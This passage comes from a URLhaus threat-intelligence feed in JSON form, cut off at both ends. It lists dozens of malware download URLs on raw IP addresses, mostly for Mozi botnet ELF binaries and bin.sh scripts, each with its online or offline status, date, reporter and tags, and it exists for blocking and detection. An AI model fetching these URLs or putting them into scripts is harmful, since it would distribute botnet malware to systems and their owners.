UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961094","urlhaus_reference":"https://urlhaus.abuse.ch/url/961094/","url":"http://42.231.120.221:57052/Mozi.m","url_status":"online","host":"42.231.120.221","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961095","urlhaus_reference":"https://urlhaus.abuse.ch/url/961095/","url":"http://182.117.11.37:60550/Mozi.m","url_status":"online","host":"182.117.11.37","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961096","urlhaus_reference":"https://urlhaus.abuse.ch/url/961096/","url":"http://186.33.104.144:39684/Mozi.m","url_status":"offline","host":"186.33.104.144","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961097","urlhaus_reference":"https://urlhaus.abuse.ch/url/961097/","url":"http://122.188.41.69:43593/Mozi.a","url_status":"online","host":"122.188.41.69","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961098","urlhaus_reference":"https://urlhaus.abuse.ch/url/961098/","url":"http://125.42.207.154:36066/Mozi.m","url_status":"offline","host":"125.42.207.154","date_added":"2021-01-14 17:20:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961093","urlhaus_reference":"https://urlhaus.abuse.ch/url/961093/","url":"http://115.230.82.41:35006/Mozi.m","url_status":"online","host":"115.230.82.41","date_added":"2021-01-14 17:19:09 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961091","urlhaus_reference":"https://urlhaus.abuse.ch/url/961091/","url":"http://113.90.177.157:38184/Mozi.m","url_status":"online","host":"113.90.177.157","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961092","urlhaus_reference":"https://urlhaus.abuse.ch/url/961092/","url":"http://112.228.183.24:59027/Mozi.m","url_status":"online","host":"112.228.183.24","date_added":"2021-01-14 17:19:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961090","urlhaus_reference":"https://urlhaus.abuse.ch/url/961090/","url":"http://117.192.226.105:50639/Mozi.m","url_status":"offline","host":"117.192.226.105","date_added":"2021-01-14 17:19:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961086","urlhaus_reference":"https://urlhaus.abuse.ch/url/961086/","url":"http://115.54.242.73:33534/Mozi.a","url_status":"online","host":"115.54.242.73","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961087","urlhaus_reference":"https://urlhaus.abuse.ch/url/961087/","url":"http://115.54.208.19:36316/Mozi.m","url_status":"online","host":"115.54.208.19","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961088","urlhaus_reference":"https://urlhaus.abuse.ch/url/961088/","url":"http://115.97.18.154:47120/Mozi.m","url_status":"offline","host":"115.97.18.154","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961089","urlhaus_reference":"https://urlhaus.abuse.ch/url/961089/","url":"http://117.213.42.231:46287/Mozi.m","url_status":"offline","host":"117.213.42.231","date_added":"2021-01-14 17:19:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961085","urlhaus_reference":"https://urlhaus.abuse.ch/url/961085/","url":"http://42.236.149.218:39536/bin.sh","url_status":"online","host":"42.236.149.218","date_added":"2021-01-14 17:14:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961083","urlhaus_reference":"https://urlhaus.abuse.ch/url/961083/","url":"http://59.94.181.146:40689/Mozi.m","url_status":"offline","host":"59.94.181.146","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961084","urlhaus_reference":"https://urlhaus.abuse.ch/url/961084/","url":"http://58.249.83.3:51123/Mozi.m","url_status":"online","host":"58.249.83.3","date_added":"2021-01-14 17:07:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961082","urlhaus_reference":"https://urlhaus.abuse.ch/url/961082/","url":"http://49.77.198.90:52540/Mozi.a","url_status":"online","host":"49.77.198.90","date_added":"2021-01-14 17:07:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961081","urlhaus_reference":"https://urlhaus.abuse.ch/url/961081/","url":"http://59.96.27.213:56964/Mozi.m","url_status":"offline","host":"59.96.27.213","date_added":"2021-01-14 17:07:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961078","urlhaus_reference":"https://urlhaus.abuse.ch/url/961078/","url":"http://61.52.62.80:57120/Mozi.m","url_status":"online","host":"61.52.62.80","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961079","urlhaus_reference":"https://urlhaus.abuse.ch/url/961079/","url":"http://58.248.113.219:44518/Mozi.a","url_status":"online","host":"58.248.113.219","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961080","urlhaus_reference":"https://urlhaus.abuse.ch/url/961080/","url":"http://58.249.22.124:50389/Mozi.m","url_status":"online","host":"58.249.22.124","date_added":"2021-01-14 17:07:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961077","urlhaus_reference":"https://urlhaus.abuse.ch/url/961077/","url":"http://42.224.241.176:34335/Mozi.m","url_status":"online","host":"42.224.241.176","date_added":"2021-01-14 17:06:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961069","urlhaus_reference":"https://urlhaus.abuse.ch/url/961069/","url":"http://42.234.234.40:54865/Mozi.m","url_status":"online","host":"42.234.234.40","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961070","urlhaus_reference":"https://urlhaus.abuse.ch/url/961070/","url":"http://27.41.216.92:50773/Mozi.a","url_status":"online","host":"27.41.216.92","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961071","urlhaus_reference":"https://urlhaus.abuse.ch/url/961071/","url":"http://42.237.56.242:52005/Mozi.m","url_status":"online","host":"42.237.56.242","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961072","urlhaus_reference":"https://urlhaus.abuse.ch/url/961072/","url":"http://222.139.126.241:56066/Mozi.m","url_status":"online","host":"222.139.126.241","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961073","urlhaus_reference":"https://urlhaus.abuse.ch/url/961073/","url":"http://222.137.133.120:32915/Mozi.m","url_status":"online","host":"222.137.133.120","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961074","urlhaus_reference":"https://urlhaus.abuse.ch/url/961074/","url":"http://222.137.123.31:43462/Mozi.a","url_status":"online","host":"222.137.123.31","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961075","urlhaus_reference":"https://urlhaus.abuse.ch/url/961075/","url":"http://219.157.163.74:33291/Mozi.m","url_status":"online","host":"219.157.163.74","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961076","urlhaus_reference":"https://urlhaus.abuse.ch/url/961076/","url":"http://220.125.119.222:1440/Mozi.m","url_status":"offline","host":"220.125.119.222","date_added":"2021-01-14 17:06:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961068","urlhaus_reference":"https://urlhaus.abuse.ch/url/961068/","url":"http://123.10.35.174:55907/Mozi.a","url_status":"online","host":"123.10.35.174","date_added":"2021-01-14 17:05:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961066","urlhaus_reference":"https://urlhaus.abuse.ch/url/961066/","url":"http://117.247.201.31:33181/Mozi.a","url_status":"offline","host":"117.247.201.31","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961067","urlhaus_reference":"https://urlhaus.abuse.ch/url/961067/","url":"http://182.121.150.204:44691/Mozi.m","url_status":"online","host":"182.121.150.204","date_added":"2021-01-14 17:05:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961059","urlhaus_reference":"https://urlhaus.abuse.ch/url/961059/","url":"http://125.42.26.224:55254/Mozi.m","url_status":"online","host":"125.42.26.224","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961060","urlhaus_reference":"https://urlhaus.abuse.ch/url/961060/","url":"http://186.33.123.24:43010/Mozi.m","url_status":"online","host":"186.33.123.24","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961061","urlhaus_reference":"https://urlhaus.abuse.ch/url/961061/","url":"http://125.41.217.246:37886/Mozi.m","url_status":"offline","host":"125.41.217.246","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961062","urlhaus_reference":"https://urlhaus.abuse.ch/url/961062/","url":"http://182.116.77.111:40153/Mozi.m","url_status":"online","host":"182.116.77.111","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961063","urlhaus_reference":"https://urlhaus.abuse.ch/url/961063/","url":"http://182.117.92.19:34305/Mozi.a","url_status":"online","host":"182.117.92.19","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961064","urlhaus_reference":"https://urlhaus.abuse.ch/url/961064/","url":"http://182.127.97.21:35653/Mozi.m","url_status":"online","host":"182.127.97.21","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961065","urlhaus_reference":"https://urlhaus.abuse.ch/url/961065/","url":"http://117.242.209.98:48908/Mozi.m","url_status":"offline","host":"117.242.209.98","date_added":"2021-01-14 17:05:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961058","urlhaus_reference":"https://urlhaus.abuse.ch/url/961058/","url":"http://113.118.12.200:40035/Mozi.m","url_status":"online","host":"113.118.12.200","date_added":"2021-01-14 17:04:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961055","urlhaus_reference":"https://urlhaus.abuse.ch/url/961055/","url":"http://117.222.166.125:54461/Mozi.a","url_status":"offline","host":"117.222.166.125","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961056","urlhaus_reference":"https://urlhaus.abuse.ch/url/961056/","url":"http://116.75.214.130:51991/Mozi.m","url_status":"offline","host":"116.75.214.130","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961057","urlhaus_reference":"https://urlhaus.abuse.ch/url/961057/","url":"http://112.168.65.51:41143/i","url_status":"online","host":"112.168.65.51","date_added":"2021-01-14 17:04:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961054","urlhaus_reference":"https://urlhaus.abuse.ch/url/961054/","url":"http://221.15.254.11:51095/i","url_status":"online","host":"221.15.254.11","date_added":"2021-01-14 17:02:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961053","urlhaus_reference":"https://urlhaus.abuse.ch/url/961053/","url":"http://58.255.142.90:36558/Mozi.a","url_status":"online","host":"58.255.142.90","date_added":"2021-01-14 16:52:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961050","urlhaus_reference":"https://urlhaus.abuse.ch/url/961050/","url":"http://59.96.37.94:47548/Mozi.m","url_status":"offline","host":"59.96.37.94","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961051","urlhaus_reference":"https://urlhaus.abuse.ch/url/961051/","url":"http://59.97.172.183:35796/Mozi.m","url_status":"offline","host":"59.97.172.183","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961052","urlhaus_reference":"https://urlhaus.abuse.ch/url/961052/","url":"http://58.255.142.229:42765/Mozi.m","url_status":"online","host":"58.255.142.229","date_added":"2021-01-14 16:52:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961048","urlhaus_reference":"https://urlhaus.abuse.ch/url/961048/","url":"http://189.51.106.169:37388/Mozi.a","url_status":"offline","host":"189.51.106.169","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961049","urlhaus_reference":"https://urlhaus.abuse.ch/url/961049/","url":"http://222.140.170.6:56849/Mozi.m","url_status":"online","host":"222.140.170.6","date_added":"2021-01-14 16:51:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961047","urlhaus_reference":"https://urlhaus.abuse.ch/url/961047/","url":"http://186.33.123.64:35574/Mozi.m","url_status":"online","host":"186.33.123.64","date_added":"2021-01-14 16:51:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961046","urlhaus_reference":"https://urlhaus.abuse.ch/url/961046/","url":"http://123.10.187.158:46947/Mozi.m","url_status":"online","host":"123.10.187.158","date_added":"2021-01-14 16:50:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961043","urlhaus_reference":"https://urlhaus.abuse.ch/url/961043/","url":"http://117.192.226.243:34452/Mozi.m","url_status":"offline","host":"117.192.226.243","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961044","urlhaus_reference":"https://urlhaus.abuse.ch/url/961044/","url":"http://119.123.223.174:33017/Mozi.m","url_status":"offline","host":"119.123.223.174","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961045","urlhaus_reference":"https://urlhaus.abuse.ch/url/961045/","url":"http://115.58.133.223:55061/Mozi.m","url_status":"online","host":"115.58.133.223","date_added":"2021-01-14 16:50:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961040","urlhaus_reference":"https://urlhaus.abuse.ch/url/961040/","url":"http://115.63.36.66:50046/Mozi.m","url_status":"online","host":"115.63.36.66","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961041","urlhaus_reference":"https://urlhaus.abuse.ch/url/961041/","url":"http://115.56.133.53:51960/Mozi.a","url_status":"online","host":"115.56.133.53","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961042","urlhaus_reference":"https://urlhaus.abuse.ch/url/961042/","url":"http://117.247.203.62:42372/Mozi.m","url_status":"offline","host":"117.247.203.62","date_added":"2021-01-14 16:50:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961039","urlhaus_reference":"https://urlhaus.abuse.ch/url/961039/","url":"http://113.88.211.251:51592/Mozi.m","url_status":"offline","host":"113.88.211.251","date_added":"2021-01-14 16:49:07 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961038","urlhaus_reference":"https://urlhaus.abuse.ch/url/961038/","url":"http://103.146.233.126:35585/Mozi.a","url_status":"offline","host":"103.146.233.126","date_added":"2021-01-14 16:49:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961035","urlhaus_reference":"https://urlhaus.abuse.ch/url/961035/","url":"http://115.51.91.178:38398/Mozi.m","url_status":"online","host":"115.51.91.178","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961036","urlhaus_reference":"https://urlhaus.abuse.ch/url/961036/","url":"http://115.55.60.104:59880/Mozi.m","url_status":"online","host":"115.55.60.104","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961037","urlhaus_reference":"https://urlhaus.abuse.ch/url/961037/","url":"http://113.92.158.127:39138/Mozi.a","url_status":"online","host":"113.92.158.127","date_added":"2021-01-14 16:49:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961033","urlhaus_reference":"https://urlhaus.abuse.ch/url/961033/","url":"http://221.15.254.11:51095/bin.sh","url_status":"online","host":"221.15.254.11","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","elf","mips"]} -{"id":"961034","urlhaus_reference":"https://urlhaus.abuse.ch/url/961034/","url":"http://115.56.31.76:45117/i","url_status":"online","host":"115.56.31.76","date_added":"2021-01-14 16:40:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"geenensp","larted":"true","tags":["32-bit","arm","elf"]} -{"id":"961032","urlhaus_reference":"https://urlhaus.abuse.ch/url/961032/","url":"http://59.13.193.79:50204/Mozi.m","url_status":"online","host":"59.13.193.79","date_added":"2021-01-14 16:37:10 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961029","urlhaus_reference":"https://urlhaus.abuse.ch/url/961029/","url":"http://59.93.18.69:45079/Mozi.m","url_status":"offline","host":"59.93.18.69","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961030","urlhaus_reference":"https://urlhaus.abuse.ch/url/961030/","url":"http://59.99.136.43:52238/Mozi.m","url_status":"offline","host":"59.99.136.43","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961031","urlhaus_reference":"https://urlhaus.abuse.ch/url/961031/","url":"http://42.230.66.23:40312/Mozi.m","url_status":"online","host":"42.230.66.23","date_added":"2021-01-14 16:37:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961026","urlhaus_reference":"https://urlhaus.abuse.ch/url/961026/","url":"http://59.97.169.179:39002/Mozi.a","url_status":"offline","host":"59.97.169.179","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961027","urlhaus_reference":"https://urlhaus.abuse.ch/url/961027/","url":"http://27.41.216.92:50773/Mozi.m","url_status":"online","host":"27.41.216.92","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961028","urlhaus_reference":"https://urlhaus.abuse.ch/url/961028/","url":"http://59.96.39.140:50050/Mozi.m","url_status":"offline","host":"59.96.39.140","date_added":"2021-01-14 16:37:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961024","urlhaus_reference":"https://urlhaus.abuse.ch/url/961024/","url":"http://182.59.203.162:60081/Mozi.m","url_status":"offline","host":"182.59.203.162","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961025","urlhaus_reference":"https://urlhaus.abuse.ch/url/961025/","url":"http://186.33.122.4:58177/Mozi.m","url_status":"online","host":"186.33.122.4","date_added":"2021-01-14 16:37:04 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961023","urlhaus_reference":"https://urlhaus.abuse.ch/url/961023/","url":"http://125.41.164.93:38589/Mozi.m","url_status":"online","host":"125.41.164.93","date_added":"2021-01-14 16:36:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961022","urlhaus_reference":"https://urlhaus.abuse.ch/url/961022/","url":"http://182.120.42.220:39229/Mozi.a","url_status":"online","host":"182.120.42.220","date_added":"2021-01-14 16:35:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961021","urlhaus_reference":"https://urlhaus.abuse.ch/url/961021/","url":"http://121.181.32.38:53595/Mozi.a","url_status":"offline","host":"121.181.32.38","date_added":"2021-01-14 16:35:06 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961018","urlhaus_reference":"https://urlhaus.abuse.ch/url/961018/","url":"http://182.119.207.249:57279/Mozi.m","url_status":"online","host":"182.119.207.249","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961019","urlhaus_reference":"https://urlhaus.abuse.ch/url/961019/","url":"http://182.116.117.139:49019/Mozi.m","url_status":"online","host":"182.116.117.139","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961020","urlhaus_reference":"https://urlhaus.abuse.ch/url/961020/","url":"http://182.121.150.84:48558/Mozi.m","url_status":"offline","host":"182.121.150.84","date_added":"2021-01-14 16:35:05 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961017","urlhaus_reference":"https://urlhaus.abuse.ch/url/961017/","url":"http://120.85.167.142:58913/Mozi.a","url_status":"online","host":"120.85.167.142","date_added":"2021-01-14 16:34:25 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not listed"},"reporter":"lrz_urlhaus","larted":"true","tags":["elf","Mozi"]} -{"id":"961016","urlhaus_reference":"https://urlhaus.abuse.ch/url/961016/","url":"http://115.58.68.51:49608/Mozi.m","url_status":"online","host":"115.58.68.51","date_added":"2021-01-14 16:34:08 UTC","threat":"malware_download","blacklists":{"spamhaus_dbl":"not listed","surbl":"not 